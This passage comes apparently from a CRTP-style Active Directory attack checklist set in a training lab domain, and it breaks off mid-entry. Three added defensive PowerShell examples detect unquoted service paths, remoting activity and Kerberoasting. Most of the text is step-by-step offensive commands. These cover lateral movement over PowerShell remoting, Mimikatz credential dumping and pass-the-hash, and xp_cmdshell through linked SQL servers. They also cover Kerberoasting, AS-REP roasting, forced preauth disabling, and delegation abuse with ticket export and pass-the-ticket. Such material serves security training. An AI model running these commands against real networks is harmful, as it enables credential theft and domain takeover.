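The "Unquoted Service Path Vuln info." section above describes the condition PowerUp's Get-ServiceUnquoted looks for but not how the path is actually resolved. The following is an added example, not from the CRTP checklist or from PowerUp: it takes Win32_Service-style records (Name, PathName, StartName), works out which executable an unquoted PathName really points at, and lists the paths that Windows would try first (C:\Program.exe, C:\Program Files\My.exe, ...) so that an administrator can verify which of them are in writable directories and quote the path. The three service records are constructed; everything else uses only the string form of PathName, so it runs offline on any PowerShell.

```powershell
# Added example (not from the CRTP checklist or PowerUp): audit service PathName values
# for the unquoted-service-path weakness. Sample service records are constructed.

function Get-ServiceExecutablePath {
    param([Parameter(Mandatory)][string]$PathName)
    # Quoted path: everything inside the first pair of double quotes is the binary.
    if ($PathName.StartsWith('"')) {
        $end = $PathName.IndexOf('"', 1)
        if ($end -gt 0) { return $PathName.Substring(1, $end - 1) }
        return $PathName.Trim('"')
    }
    # Unquoted: the binary ends at the first ".exe" token (-match is case-insensitive).
    if ($PathName -match '^(?<exe>.*?\.exe)(\s|$)') { return $Matches.exe }
    # No ".exe" present: treat the first whitespace-delimited token as the binary.
    return ($PathName -split '\s+')[0]
}

function Test-UnquotedServicePath {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$PathName,
        [string]$StartName = 'LocalSystem'
    )
    $exe = Get-ServiceExecutablePath -PathName $PathName
    # Weak only when the path is unquoted AND the executable's own path contains a space.
    $vulnerable = (-not $PathName.StartsWith('"')) -and ($exe -match ' ')
    $candidates = @()
    if ($vulnerable) {
        # CreateProcess tries each space-delimited prefix with ".exe" appended before it
        # reaches the real binary, e.g. C:\Program.exe, then C:\Program Files\My.exe.
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
        }
    }
    [pscustomobject]@{
        Name       = $Name
        PathName   = $PathName
        Executable = $exe
        StartName  = $StartName      # the checklist's first precondition: who the service runs as
        Vulnerable = $vulnerable
        Candidates = $candidates
    }
}

function Find-UnquotedServicePath {
    param([Parameter(Mandatory)][object[]]$Services)
    foreach ($s in $Services) {
        $r = Test-UnquotedServicePath -Name $s.Name -PathName $s.PathName -StartName $s.StartName
        if ($r.Vulnerable) { $r }
    }
}

# Constructed sample records in the shape of Win32_Service (Name, PathName, StartName).
$SampleServices = @(
    [pscustomobject]@{ Name = 'GoodSvc'; PathName = '"C:\Program Files\Vendor\agent.exe" /service'; StartName = 'LocalSystem' }
    [pscustomobject]@{ Name = 'BadSvc';  PathName = 'C:\Program Files\My App\svc.exe -arg';         StartName = 'LocalSystem' }
    [pscustomobject]@{ Name = 'svchost'; PathName = 'C:\Windows\system32\svchost.exe -k netsvcs';  StartName = 'LocalSystem' }
)

# Offline run over the sample. On a real host replace $SampleServices with:
#   Get-CimInstance -ClassName Win32_Service | Select-Object Name, PathName, StartName
Find-UnquotedServicePath -Services $SampleServices |
    Format-List Name, PathName, StartName, Candidates
```

Only BadSvc is reported, with candidates C:\Program.exe and C:\Program Files\My.exe: GoodSvc is quoted, and svchost has a space only in its arguments, not in the executable path. For each reported service the fix is to quote the binary path in the service's ImagePath (and, while there, to check the permissions on the directories the candidate paths fall in); the StartName column carries the checklist's first precondition so that SYSTEM services can be prioritised.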
LATERAL MOVEMENT WITH POWERSHELL REMOTING

What have we done till now?
- We have extensively enumerated our domain (PowerView, AD module, Group Policy module, BloodHound).
- We have escalated our privileges locally.
- We have also found other machines in the domain where we have local admin access.
- So, now we will learn lateral movement techniques so that we can use our local admin rights to escalate our privileges to the domain level.

- One of the most common and powerful techniques of lateral movement is the protocol PowerShell Remoting.
- PowerShell Remoting is an administration capability baked into newer versions of Windows that allows admins to do multiple tasks on multiple machines really fast.
- You will find this increasingly used in enterprises. It is enabled by default on Server 2012 onwards.
- You may need to enable remoting (Enable-PSRemoting) on a desktop Windows machine, and admin privs are required to do that.
- You get an elevated shell on a remote system if admin creds are used to authenticate (which is the default setting).
- PowerShell Remoting by default uses TCP port 5985 (it is based on WinRM):
  - 5985 (HTTP transport)
  - 5986 (with SSL)

Types of PS Remoting :
- One-to-One (interactive login to the machine; creds are not left on the target unless there is CredSSP or unconstrained delegation on the target machine)
- One-to-Many

One-To-One :
1. Works over a session called a PSSession (a PSSession is interactive, runs in a new process called wsmprovhost and is a stateful session)
2. Useful cmdlets:
   a) New-PSSession
   b) Enter-PSSession
3. Enter-PSSession does not have a parameter like -FilePath to specify a script to run remotely, as Invoke-Command (One-To-Many) does

Tool        : PowerShell
Command     : Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
Description : PowerShell remoting into the dcorp-adminsrv computer
Privileges  : Local admin privs on target m/c (in this case, dcorp-adminsrv)

Tool        : PowerShell
Command     : $sess = New-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
              Enter-PSSession -Session $sess
Description : Using the statefulness of the PSSession. This way we can PowerShell remote into the machine and also conserve the state.
Privileges  : Local admin privs on target m/c (in this case, dcorp-adminsrv)
Comments    : This session persists until the wsmprovhost process is killed on the remote machine or we terminate the session from our side.

One-To-Many :
1. a.k.a. Fanout Remoting
2. Non-interactive
3. Executes commands in parallel
4. Useful cmdlets:
   Invoke-Command
   a) Run commands & scripts on:
      - multiple remote computers
      - in disconnected sessions (v3)
      - as background jobs, and more
   b) The best thing in PowerShell for passing the hashes, using credentials and executing commands on multiple remote computers.
   c) Use the -Credential parameter to pass a username/password

Tool        : PowerShell
Command     : Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock {whoami;hostname}
Description : Execute a script block on a remote machine
Privileges  : Local admin privs on target m/c (in this case, dcorp-adminsrv)

Tool        : PowerShell
Command     : Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content <list_of_servers.txt>)
Description : Execute commands or scripts on a list of machines
Privileges  : Local admin privs on target m/c (in this case, dcorp-adminsrv)

Tool        : PowerShell
Command     : Invoke-Command -FilePath C:\Scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers.txt>)
Description : Execute scripts from files on a list of machines
Privileges  : Local admin privs on target m/c (in this case, dcorp-adminsrv)
Comments    : Enter-PSSession and New-PSSession do not have a parameter like -FilePath to specify a script to run remotely; it is Invoke-Command that has the -FilePath parameter. It takes the script as input, converts it into a script block and executes it as a base64 encoded script in the memory of the target machine.

If we try to run a script or a cmdlet on a remote machine through PS Remoting and it does not run / produces an error message, chances are that the PowerShell session we are in (on the remote machine) is running in Constrained Language mode. When a PowerShell session is running in Constrained Language mode, it has a list of actions that cannot be executed (like dangerous scripts, etc.).

In our case, AppLocker is configured on dcorp-adminsrv. PowerShell v5 is smart enough to restrict itself to Constrained Language mode if AppLocker is configured in "allow" mode for powershell.exe.

Loading local functions on a remote machine and executing them

Step 1  Create some function :

        function hello
        {
            Write-Output "Hello from function"
        }

Step 2  Save it (hello.ps1)
Step 3  On your local machine, load the script :
        . .\hello.ps1
Step 4  Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock ${function:hello}

Tool        : PowerShell
Command     : Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers.txt>)
Description : Execute locally loaded functions on a remote machine
Privileges  : Local admin privs on target m/c (in this case, dcorp-adminsrv)

Tool        : PowerShell
Command     : Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers.txt>) -ArgumentList
Description : Execute locally loaded functions on a remote machine and pass arguments to the function
Privileges  : Local admin privs on target m/c (in this case, dcorp-adminsrv)

Loading local functions on a remote machine and executing them (using Enter-PSSession)

Step 1  $sess = New-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
        (Create a session state variable)
Step 2  Invoke-Command -FilePath C:\AD\Tools\hello.ps1 -Session $sess
        (Load the script into the session)
Step 3  Enter-PSSession -Session $sess
        (Enter our session)
Step 4  hello
        (Run our custom function on the remote machine)

Tool        : PowerShell
Command     : $sess = New-PSSession -ComputerName Server1
              Invoke-Command -Session $sess -ScriptBlock {$Proc = Get-Process}
              Invoke-Command -Session $sess -ScriptBlock {$Proc.name}
Description : Execute "stateful" commands using Invoke-Command

LATERAL MOVEMENT WITH INVOKE-MIMIKATZ
- The script (Invoke-Mimikatz) can be used to dump credentials, tickets and more using mimikatz with PowerShell, without dropping the mimikatz exe to disk.
- It is very useful for passing and replaying hashes and tickets, and for many exciting AD attacks.
- Using the code from ReflectivePEInjection, mimikatz is loaded reflectively into memory. All the functions of mimikatz can be used through this script.
- The script needs admin privs for dumping creds from the local machine. Many attacks need specific privs, which will be covered while discussing the attack.

Reading from LSASS.exe

Tool        : Mimikatz (Invoke-Mimikatz)
Command     : Invoke-Mimikatz -DumpCreds
Description : Dump credentials on a local machine
Privileges  : admin privs on local machine

Tool        : Mimikatz (Invoke-Mimikatz)
Command     : Invoke-Mimikatz -DumpCreds -ComputerName @("sys1", "sys2")
Description : Dump credentials on multiple remote machines
Privileges  : admin privs on the machines from which lsass is dumped
Comments    : Invoke-Mimikatz uses the PS Remoting cmdlet "Invoke-Command" to perform these functions.

Writing to LSASS.exe

Tool        : Mimikatz (Invoke-Mimikatz)
Command     : Invoke-Mimikatz -Command ' "sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlm_hash> /run:powershell.exe" '
Description : Using "Over pass the hash" to generate tokens from hashes
Privileges  : admin privs
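Since every incoming PSSession and every Invoke-Command job runs inside a wsmprovhost.exe process on the target, a host-side check can list those processes, the account each one authenticated as, and what they have spawned. The function below is an added defensive example (not part of the original checklist); it works over any list of objects with ProcessId, ParentProcessId, Name and Owner, so it is demonstrated here on constructed data, and the Get-LiveProcessList helper (also added here) builds the same shape from CIM on a Windows host.

```powershell
# Added example: find PowerShell Remoting activity on a host by looking for
# wsmprovhost.exe (the process that hosts every incoming PSSession / Invoke-Command)
# and for the processes it has started. Works on any list of objects exposing
# ProcessId, ParentProcessId, Name and Owner, so it can run on constructed data.

function Get-RemotingIndicators {
    param(
        [Parameter(Mandatory)]
        [object[]]$Processes
    )

    $sessionHosts = $Processes | Where-Object { $_.Name -ieq 'wsmprovhost.exe' }

    foreach ($h in $sessionHosts) {
        # Direct children of a wsmprovhost.exe were started by the remote caller.
        $children = @($Processes | Where-Object { $_.ParentProcessId -eq $h.ProcessId })
        [pscustomobject]@{
            SessionHostPid = $h.ProcessId
            Owner          = $h.Owner          # account the remote caller authenticated as
            SpawnedCount   = $children.Count
            Spawned        = ($children | ForEach-Object { $_.Name }) -join ','
        }
    }
}

# Live query (Windows only): build the same object shape from CIM.
function Get-LiveProcessList {
    Get-CimInstance Win32_Process | ForEach-Object {
        $owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner
        [pscustomobject]@{
            ProcessId       = $_.ProcessId
            ParentProcessId = $_.ParentProcessId
            Name            = $_.Name
            Owner           = if ($owner.User) { "$($owner.Domain)\$($owner.User)" } else { $null }
        }
    }
}

# Constructed sample (not a real process list): two remoting hosts, one of which
# has spawned whoami.exe and hostname.exe, as -ScriptBlock {whoami;hostname} would.
$sample = @(
    [pscustomobject]@{ ProcessId = 700;  ParentProcessId = 4;    Name = 'svchost.exe';     Owner = 'NT AUTHORITY\NETWORK SERVICE' },
    [pscustomobject]@{ ProcessId = 2100; ParentProcessId = 700;  Name = 'wsmprovhost.exe'; Owner = 'dcorp\appadmin' },
    [pscustomobject]@{ ProcessId = 2140; ParentProcessId = 2100; Name = 'whoami.exe';      Owner = 'dcorp\appadmin' },
    [pscustomobject]@{ ProcessId = 2141; ParentProcessId = 2100; Name = 'hostname.exe';    Owner = 'dcorp\appadmin' },
    [pscustomobject]@{ ProcessId = 3300; ParentProcessId = 700;  Name = 'wsmprovhost.exe'; Owner = 'dcorp\student1' },
    [pscustomobject]@{ ProcessId = 4000; ParentProcessId = 1;    Name = 'explorer.exe';    Owner = 'dcorp\student1' }
)

Get-RemotingIndicators -Processes $sample | Format-Table -AutoSize

# On a Windows host, run the same check against live processes:
# Get-RemotingIndicators -Processes (Get-LiveProcessList)
```

On the constructed sample this reports two session hosts: PID 2100 owned by dcorp\appadmin with two spawned processes, and PID 3300 owned by dcorp\student1 with none.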
- MS SQL servers are generally deployed in plenty in a Windows domain.
- SQL servers provide very good options for lateral movement, as domain users can be mapped to database roles.
- For MSSQL and PowerShell hackery, let's use PowerUpSQL (https://github.com/NETSPI/PowerUpSQL).

Tool        : PowerUpSQL
Command     : Get-SQLInstanceDomain
Description : Discovery (SPN scanning)
Privileges  : domain user

Tool        : PowerUpSQL
Command     : Get-SQLConnectionTestThreaded
              Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
Description : Check accessibility
Privileges  : domain user

Tool        : PowerUpSQL
Command     : Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Description : Gather information (what are the privs on the SQL Server, version details, etc.)
Privileges  : domain user

- A database link allows a SQL server to access external data sources like other SQL servers, OLE DB data sources or even Excel sheets.
- In case of database links between SQL servers, that is, linked SQL servers, it is possible to execute stored procedures.
- Database links work even across forest trusts.

Searching for Database Links

Tool        : PowerUpSQL
Command     : Get-SQLServerLink -Instance dcorp-mssql -Verbose
Description : Look for links to remote servers
Privileges  : domain user

Tool        : HeidiSQL
Command     : select * from master..sysservers
Description : Look for links to remote servers
Privileges  : domain user

Hopping on Database Links - (Manually)

Tool        : HeidiSQL
Command     : select * from openquery("dcorp-sql1", 'select * from master..sysservers')
Description : Hopping from dcorp-mssql to dcorp-sql1 using openquery()
Comments    : The openquery() function can be used to run queries on a linked database.

Hopping on Database Links - (Automated)

Tool        : PowerUpSQL
Command     : Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
Description : Hopping across database links

An alternative to this is to chain a series of openquery queries to access links within links.
Eg: select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgmt","select * from master..sysservers")')
As you can see, when doing so manually, the quotes become a huge hindrance as the links are chained more and more.

Executing commands
- On the target server, either xp_cmdshell should already be enabled
(or)
- If rpcout is enabled (disabled by default), xp_cmdshell can be enabled using:
  EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "eu-sql"

Tool        : PowerUpSQL
Command     : Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'"

An alternative to this is to chain a series of nested link queries from the initial SQL server:
select * from openquery("dcorp-sql1", 'select * from openquery("dcorp-mgmt","select * from openquery("eu-sql", ''''select @@version as version;exec master..xp_cmdshell "powershell whoami")'''')'')')
Classic Kerberoast
Privilege escalation to Domain Admin using Kerberoast :
- Offline cracking of service account passwords.
- The Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of the service account.
- This makes it possible to request a ticket and do an offline password attack.
- Service accounts are many times ignored (passwords are rarely changed) and have privileged access.
- Password hashes of service accounts could be used to create Silver tickets.

Note :
Kerberoast is generally targeted at user accounts which are used as service accounts.

So, how do we / how does a DC find out which user accounts are used as service accounts?
- If a user account's Service Principal Name (SPN) is NOT NULL, then the KDC assumes that user account is used as a service account.

Tool        : PowerView
Command     : Get-NetUser -SPN
Description : Check the SPNs (whether they are null or not null) of the user accounts
Privileges  : Domain User

Tool        : AD Module
Command     : Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Description : Check the user accounts whose SPNs are not null
Privileges  : Domain User

Once we have identified the users whose SPNs are not null, we can request the TGS for those users.

Tool        : PowerShell
Command     : Step 1 : Add-Type -AssemblyName System.IdentityModel
              Step 2 : New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
Description : Request a TGS
Privileges  : Domain User

Request-SPNTicket from PowerView can also be used, for cracking with John or Hashcat.

Tool        : PowerShell
Command     : klist
Description : Check if we have a TGS granted (for the current user on the service MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local)
Privileges  : Domain User

Once we have the TGS in memory (confirmed by klist), we can save it to disk using Mimikatz.

Tool        : Mimikatz (Invoke-Mimikatz)
Command     : Invoke-Mimikatz -Command ' "kerberos::list /export" '
Description : Export all tickets in memory onto the disk using mimikatz
Privileges  : Domain User
Comments    : saved as .kirbi file

Tool        : tgsrepcrack.py
Command     : python tgsrepcrack.py <wordlist> <.kirbi ticket>
Description : Crack the service account password
Privileges  : Any user

Targeted Kerberoasting - (AS-REP Roasting)
- If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled, i.e. Kerberos preauth is disabled, it is possible to grab the user's crackable AS-REP and brute-force it offline.
- With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forcibly disabled as well.
- Very rare case, since by default Kerberos pre-auth is enabled.
- Some of the cases where Kerberos preauth might be disabled are when users are connecting via VPN or when Linux machines are connected to Active Directory.

1. Enumerating accounts with Kerberos Preauth disabled

Tool        : PowerView_Dev
Command     : Get-DomainUser -PreauthNotRequired -Verbose
Description : Find accounts with Kerberos preauth disabled
Privileges  : Domain User

Tool        : AD Module
Command     : Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Description : Find accounts with Kerberos preauth disabled
Privileges  : Domain User

2. Force disabling Kerberos PreAuth

Let's enumerate the permissions for RDPUsers on ACLs using PowerView Dev.

Tool        : PowerView_Dev (Step 1)
Command     : Invoke-ACLScanner -ResolveGUIDs | ? {$_.IdentityReferenceName -match "RDPUsers"}
Description : Find users of the RDPUsers group who have FullControl or Write permissions
Privileges  : Domain User
Comments    : Here, all student users belong to the RDPUsers group, hence we are scanning the ACLs of RDPUsers' members.

Tool        : PowerView_Dev (Step 2)
Command     : Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose
Description : Forcefully disable Kerberos preauth on users that we have FullControl or Write permissions on (here, Control1User)
Privileges  : Domain User

Tool        : PowerView_Dev (Step 3)
Command     : Get-DomainUser -PreauthNotRequired -Verbose
Description : Check if preauth is disabled
Privileges  : Domain User

- Once the preauth-disabled users are identified, we request the encrypted AS-REP for offline brute-force (using the ASREPRoast tool).

Tool        : ASREPRoast
Command     : Get-ASREPHash -UserName VPN1user -Verbose
Description : Request the hash for a particular Kerberos preauth-disabled user (here, VPN1user)
Privileges  : Domain User

Tool        : ASREPRoast
Command     : Invoke-ASREPRoast -Verbose
Description : Enumerate all users with Kerberos preauth disabled and request a hash
Privileges  : Domain User

Targeted Kerberoasting - (Set SPN)
- With enough rights (GenericAll, GenericWrite), a target user's SPN can be set to anything (unique in the domain).
- This way, the KDC shall assume the user account to be a service account and we will be able to request a TGS for offline cracking.
- The SPN needs to be unique in the domain and of the format <machine_name>\<service_name>
- Note that it is not required for the machine name and service name to be valid, it just has to be unique.

Tool        : PowerView_Dev (Step 1)
Command     : Invoke-ACLScanner -ResolveGUIDs | ? {$_.IdentityReferenceName -match "RDPUsers"}
Description : Find users of the RDPUsers group who have FullControl or Write permissions
Privileges  : Domain User
Comments    : Here, all student users belong to the RDPUsers group, hence we are scanning the ACLs of RDPUsers' members.

Tool        : PowerView_Dev (Step 2)
Command     : Get-DomainUser -Identity support1user | select serviceprincipalname
Description : Check if the user already has an SPN
Privileges  : Domain User

Tool        : AD Module (Step 2)
Command     : Get-ADUser -Identity support1user -Properties ServicePrincipalName | select ServicePrincipalName
Description : Check if the user already has an SPN
Privileges  : Domain User

Tool        : PowerView_Dev (Step 3)
Command     : Set-DomainObject -Identity support1user -Set @{serviceprincipalname='dcorp\whatever1'}
Description : Set an SPN for the user
Privileges  : Domain User

Tool        : AD Module (Step 3)
Command     : Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='dcorp\whatever1'}
Description : Set an SPN for the user
Privileges  : Domain User

Tool        : PowerShell (Step 4)
Command     : Step 1 : Add-Type -AssemblyName System.IdentityModel
              Step 2 : New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "dcorp\whatever1"
Description : Request a TGS
Privileges  : Domain User
Comments    : Only leaves a 4769 in the DC logs (very silent)

Tool        : PowerShell (Step 5)
Command     : klist
Description : Check if we have a TGS granted (for the current user on the service dcorp\whatever1)
Privileges  : Domain User

Once we have the TGS in memory (confirmed by klist), we can save it to disk using Mimikatz.

Tool        : Mimikatz (Invoke-Mimikatz) (Step 6)
Command     : Invoke-Mimikatz -Command ' "kerberos::list /export" '
Description : Export all tickets in memory onto the disk using mimikatz
Privileges  : Domain User
Comments    : saved as .kirbi file

Tool        : tgsrepcrack.py (Step 7)
Command     : python tgsrepcrack.py <wordlist> <.kirbi ticket>
Description : Crack the service account password
Privileges  : Any user

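The checklist notes that a TGS request for a user-account SPN "only leaves a 4769 in the DC logs". The following is an added defensive example (not from the original): it runs over 4769-style records and flags a requester that asks for tickets to many distinct user-account services in a short window, counting how many of them were RC4-encrypted (TicketEncryptionType 0x17, the type offline crackers want). The field names mirror event 4769 (TargetUserName, ServiceName, TicketEncryptionType, IpAddress); the record shape and all sample records are constructed.

```powershell
# Added example: spot Kerberoast-style activity in 4769 ("A Kerberos service
# ticket was requested") records. Two signals are combined:
#  1. one requester asks for tickets to many distinct services in a short window
#     (a roast requests a TGS for every SPN-bearing user account it found);
#  2. the service is a user account (no trailing '$'), i.e. a human-chosen
#     password, and the ticket is RC4 (0x17), which is what cracking tools want.

function Find-KerberoastCandidates {
    param(
        [Parameter(Mandatory)] [object[]]$Events,
        [int]$MinDistinctServices = 5,
        [int]$WindowMinutes = 10
    )

    $findings = @()
    foreach ($group in ($Events | Group-Object TargetUserName)) {
        $ordered = @($group.Group | Sort-Object TimeCreated)
        $start   = $ordered[0].TimeCreated
        $end     = $ordered[-1].TimeCreated
        # Computer accounts ('HOST$') are skipped: their passwords are long and random.
        $userSvc  = @($ordered | Where-Object { $_.ServiceName -notmatch '\$$' })
        $distinct = @($userSvc | Select-Object -ExpandProperty ServiceName -Unique)
        $rc4      = @($userSvc | Where-Object { $_.TicketEncryptionType -eq '0x17' })
        $minutes  = [int]($end - $start).TotalMinutes

        if ($distinct.Count -ge $MinDistinctServices -and $minutes -le $WindowMinutes) {
            $findings += [pscustomobject]@{
                Requester        = $group.Name
                SourceIp         = ($ordered | Select-Object -ExpandProperty IpAddress -Unique) -join ','
                DistinctServices = $distinct.Count
                Rc4Tickets       = $rc4.Count
                Services         = $distinct -join ';'
                Reason           = "$($distinct.Count) user-account services in $minutes min; $($rc4.Count) RC4 tickets"
            }
        }
    }
    return $findings
}

# Constructed sample records (not real log data). Field names follow event 4769.
$t = Get-Date '2024-01-15 10:00:00'
$events = @(
    # normal user: two AES tickets to computer-account services
    [pscustomobject]@{ TimeCreated=$t.AddMinutes(1); TargetUserName='jane@DOLLARCORP.MONEYCORP.LOCAL'; ServiceName='DCORP-DC$';    TicketEncryptionType='0x12'; IpAddress='::ffff:172.16.50.11' },
    [pscustomobject]@{ TimeCreated=$t.AddMinutes(2); TargetUserName='jane@DOLLARCORP.MONEYCORP.LOCAL'; ServiceName='DCORP-MSSQL$'; TicketEncryptionType='0x12'; IpAddress='::ffff:172.16.50.11' }
)
# suspicious: one account, five user-account SPN holders, all RC4, within two minutes
$svc = 'svcadmin','websvc','sqlsvc','backupsvc','appsvc'
for ($i = 0; $i -lt $svc.Count; $i++) {
    $events += [pscustomobject]@{ TimeCreated=$t.AddMinutes(5 + $i * 0.5); TargetUserName='student1@DOLLARCORP.MONEYCORP.LOCAL'; ServiceName=$svc[$i]; TicketEncryptionType='0x17'; IpAddress='::ffff:172.16.100.1' }
}

Find-KerberoastCandidates -Events $events | Format-List
```

On the sample, jane produces no finding (computer-account services only) and student1 is reported with 5 distinct services and 5 RC4 tickets; on a DC the same function can be fed records built from Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769}.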

- Kerberos Delegation allows to "reuse the end-user credentials to access resources hosted on a different server".
- This is typically useful in multi-tier services or applications where a Kerberos Double Hop is required.
- For example, users authenticate to a web server and the web server makes requests to a database server. The web server can request access to resources (all or some resources, depending on the type of delegation) on the database server as the user and not as the web server's service account.
- Please note that, for the above example, the service account for the web service must be trusted for delegation to be able to make requests as a user.
- Kerberos Delegation was a solution to the Kerberos Double Hop problem.
- In our above example, if the web server has unconstrained delegation on it (i.e. if the service account of the web service is trusted for delegation), then it can impersonate the user that has authenticated to it and access ANY service in the domain as the user.

- There are two types of Kerberos Delegation:
  * General/Basic or Unconstrained Delegation, which allows the first hop server (web server in our example) to request access to any service on any computer in the domain.
  * Constrained Delegation, which allows the first hop server (web server in our example) to request access only to specified services on specified computers. If the user is not using Kerberos authentication to authenticate to the first hop server, Windows offers Protocol Transition to transition the request to Kerberos.

- Please note that, in both types of delegation, a mechanism is required to impersonate the incoming user and authenticate to the second hop server (database server in our example) as the user.

Unconstrained Delegation
- When set for a particular service account, unconstrained delegation allows delegation to any service on any resource in the domain as a user.
- When unconstrained delegation is enabled, the DC places the user's TGT inside the TGS. When presented to the server with unconstrained delegation, the TGT is extracted from the TGS and stored in LSASS. This way the server can re-use the user's TGT to access any other resource as the user.
- This can be used to escalate privileges in case we can compromise the computer with unconstrained delegation and a Domain Admin connects to that machine.
- If we have local admin privs on the web server (say, via a compromise), then it is possible to extract the TGTs from the LSASS process. Moreover, if high value targets like DAs authenticate to the web server, then as a local admin on the web server we may even be able to get the TGT of the Domain Admin user.

Tool        : PowerView
Command     : Get-NetComputer -UnConstrained
Description : Discover domain computers which have unconstrained delegation enabled
Privileges  : Domain User
Comments    : Note that the DC will always come up in the results of machines which have unconstrained delegation; ignore the DCs and look for other machines.

Tool        : AD Module
Command     : Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Description : Discover domain computers which have unconstrained delegation enabled
Privileges  : Domain User

Tool        : AD Module
Command     : Get-ADUser -Filter {TrustedForDelegation -eq $True}
Description : Discover domain user accounts which have unconstrained delegation enabled
Privileges  : Domain User

In our case, dcorp-appsrv is a machine which has unconstrained delegation enabled on it. From dcorp-adminsrv we got access to the 'appadmin' user. So, we spawn a PowerShell process with the privs of appadmin and run Find-LocalAdminAccess to see which other machines appadmin is a local admin on. And we find that appadmin is a local admin on dcorp-appsrv (the machine with unconstrained delegation).

Once we identify the machine where unconstrained delegation is enabled, we need to compromise that server (or servers).

Tool        : Mimikatz (Invoke-Mimikatz)
Command     : Invoke-Mimikatz -Command ' "sekurlsa::tickets /export" '
Description : Check the current tokens and save the tickets to the disk; check if any DA tokens are available
Privileges  : local admin privs

Sometimes there are no DA tokens on the server at that instant, so what we can do is poll every few (say, 100) seconds and check whether an Administrator (or DA) token is obtained on the server.
This can be done as follows:
Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose

Tool        : Mimikatz (Invoke-Mimikatz)
Command     : Invoke-Mimikatz -Command ' "sekurlsa::tickets" '
Description : Check the current tokens; check if any DA tokens are available
Privileges  : local admin privs

Once we obtain a Domain Admin ticket, we can use Mimikatz to perform Pass the Ticket.

Tool        : Mimikatz (Invoke-Mimikatz)
Command     : Invoke-Mimikatz -Command ' "kerberos::ptt C:\Users\appadmin\Documents\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi" '
Description : Re-use the DA token (Pass the Ticket) by injecting the DA token into the memory of the PowerShell process
Privileges  : local admin privs

ls \\dcorp-dc.dollarcorp.moneycorp.local\c$ - To check

Constrained Delegation
- Constrained Delegation, when enabled on a service account, allows access only to specified services on specified computers as a user.
- A typical scenario where constrained delegation is used: a user authenticates to a web service without using Kerberos, and the web service makes requests to a database server to fetch results based on the user's authorization.
- To impersonate the user, the Service for User (S4U) extension is used, which provides two extensions:
  * Service for User to Self (S4U2self) - Allows a service to obtain a forwardable TGS to itself on behalf of a user with just the user principal name, without supplying a password. The service account must have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION (T2A4D) UserAccountControl attribute.
  * Service for User to Proxy (S4U2proxy) - Allows a service to obtain a TGS to a second service on behalf of a user. Which second service? This is controlled by the msDS-AllowedToDelegateTo attribute of the (first) service account. This attribute contains a list of SPNs to which the user token can be forwarded.

Constrained Delegation with Protocol Transition

To abuse constrained delegation in the above scenario, we need to have access to the websvc account. If we have access to that account, it is possible to access the services listed in msDS-AllowedToDelegateTo of the websvc account as ANY user.

Tool        : PowerView (Dev)
Command     : Get-DomainUser -TrustedToAuth
Description : Discover domain user accounts which have constrained delegation enabled
Privileges  : Domain User

Tool        : PowerView (Dev)
Command     : Get-DomainComputer -TrustedToAuth
Description : Discover domain computers which have constrained delegation enabled
Privileges  : Domain User

Tool        : AD Module
Command     : Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
Description : Discover domain objects (users and computers) which have constrained delegation enabled
Privileges  : Domain User

Note that, in order to proceed, we need to have either the plaintext password or the NTLM hash of the websvc account (required).
In this case, we already have access to websvc's hash from dcorp-adminsrv.
Using asktgt from kekeo, we request a TGT (steps 2 and 3 of the constrained delegation diagram).

Tool        : kekeo (a tool to read and write tickets without having admin privs)
Command     : tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:<websvc's hash>
Description : Request a TGT
Privileges  : Domain user
Comments    : Getting a TGT is equivalent to having local admin privs on the service account.

Using s4u from kekeo, we request a TGS (steps 4 & 5 of the constrained delegation diagram).

Tool        : kekeo (a tool to read and write tickets without having admin privs)
Command     : tgs::s4u /tgt:<.kirbi file received from asktgt> /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.local
Description : Request a TGS
Privileges  : domain user
Comments    : /user = the user to be impersonated
              /service = the service listed in msDS-AllowedToDelegateTo for which we request the TGS

Tool        : Mimikatz (Invoke-Mimikatz)
